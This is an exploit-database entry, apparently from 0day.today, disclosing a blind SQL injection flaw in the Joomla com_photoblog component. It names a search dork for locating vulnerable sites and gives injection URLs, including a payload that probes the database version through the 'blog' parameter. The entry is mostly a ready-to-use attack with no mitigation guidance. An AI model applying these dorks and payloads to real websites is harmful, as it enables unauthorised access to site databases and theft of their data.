id: 10770
date: 02/06/2010
title: Joomla Component (com_photoblog) Blind Sql Injection Vulnerability
author: altbta
cves: 

==================================================================
Joomla Component (com_photoblog) Blind Sql Injection Vulnerability
==================================================================

.:. Script : Joomla
.:. Download Script: http://webguerilla.net/downloads/3-components-for-joomla-1
.:. Bug Type : Blind Sql Injection
.:. Dork : inurl:"com_photoblog"

===[ Exploit ]===
 
www.site.com/detail.php?id=[Blind<http://www.site.com/detail.php?id=[Blind> SQL INJECTION]
 
 
www.site.com/index.php?option=com_photoblog&view=images&category=1&celebs&blog=1+and<http://www.site.com/index.php?option=com_photoblog&view=images&category=1&celebs&blog=1+and> substring(@@version,1,1)=5



#  0day.today [2023-03-26]  #